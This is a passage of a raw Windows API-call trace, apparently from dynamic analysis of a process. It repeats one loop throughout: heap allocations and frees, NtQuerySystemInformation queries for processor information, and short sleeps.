[0221.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.235] Sleep (dwMilliseconds=0x110) [0221.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.255] Sleep (dwMilliseconds=0x110) [0221.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.268] Sleep (dwMilliseconds=0x110) [0221.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.284] Sleep (dwMilliseconds=0x110) [0221.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.297] Sleep (dwMilliseconds=0x110) [0221.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.313] Sleep (dwMilliseconds=0x110) [0221.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.329] Sleep (dwMilliseconds=0x110) [0221.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.348] Sleep (dwMilliseconds=0x110) [0221.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.357] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.357] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.360] Sleep (dwMilliseconds=0x110) [0221.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.381] Sleep (dwMilliseconds=0x110) [0221.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.391] Sleep (dwMilliseconds=0x110) [0221.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.411] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.412] Sleep (dwMilliseconds=0x110) [0221.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.433] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.437] Sleep (dwMilliseconds=0x110) [0221.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.458] Sleep (dwMilliseconds=0x110) [0221.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 